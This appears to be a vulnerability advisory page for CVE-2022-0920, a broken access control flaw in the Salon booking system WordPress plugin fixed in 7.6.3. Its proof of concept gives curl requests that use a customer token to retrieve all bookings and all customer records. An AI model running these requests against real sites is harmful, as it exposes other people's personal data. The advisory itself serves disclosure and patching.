Salon booking system < 7.6.3 – Customer+ Bookings/Customers Data Disclosure | CVE 2022-0920 | Plugin Vulnerabilities

Description

The plugin does not have proper authorisation in some of its endpoints, which could allow customers to access all bookings and other customer's data

Proof of Concept

Make a booking to get a customer account

Login via API and get access token: curl "https://example.com/?rest_route=/salon/api/v1/login&name=test@gmail.com&password=11111111"
response: {"status":"OK","access_token":"5ad1d8d73d058958e98987bec31a12d25c14b9ba"}

Send requests to get all bookings/customers data using the access token
curl "http://example.com/?rest_route=/salon/api/v1/bookings/" -H "Access-Token:5ad1d8d73d058958e98987bec31a12d25c14b9ba"
curl "http://example.com/?rest_route=/salon/api/v1/customers/" -H "Access-Token:5ad1d8d73d058958e98987bec31a12d25c14b9ba"

Affects Plugins

salon-booking-system

Fixed in 7.6.3

salon-booking-plugin-pro

Fixed in 7.6.3

References

CVE

Classification

Type

INCORRECT AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Huli from Cymetrics

Submitter

Huli from Cymetrics

Submitter website

https://cymetrics.io

Verified

Yes

WPVDB ID

5a5ab7a8-be67-4f70-925c-9cb1eff2fbe0

Timeline

Publicly Published

2022-03-21 (about 3 years ago)

Added

2022-03-21 (about 3 years ago)

Last Updated

2022-04-11 (about 3 years ago)

Other

Published

Title

Published

2025-05-05

Title

Reales WP STPT <= 2.1.2 - Unauthorized User Registration

Published

2024-03-05

Title

Testimonial Slider < 2.3.7 - Author+ Settings Update

Published

2024-03-01

Title

GenerateBlocks < 1.8.3 - Contributor+ Arbitrary Draft/Private Post Access

Published

2025-06-18

Title

AI Engine 2.8.0 - 2.8.3 - Subscriber+ Privilege Escalation via MCP

Published

2024-03-12

Title

Awesome Support < 6.1.7 - Insufficient Authorization via wpas_can_delete_attachments()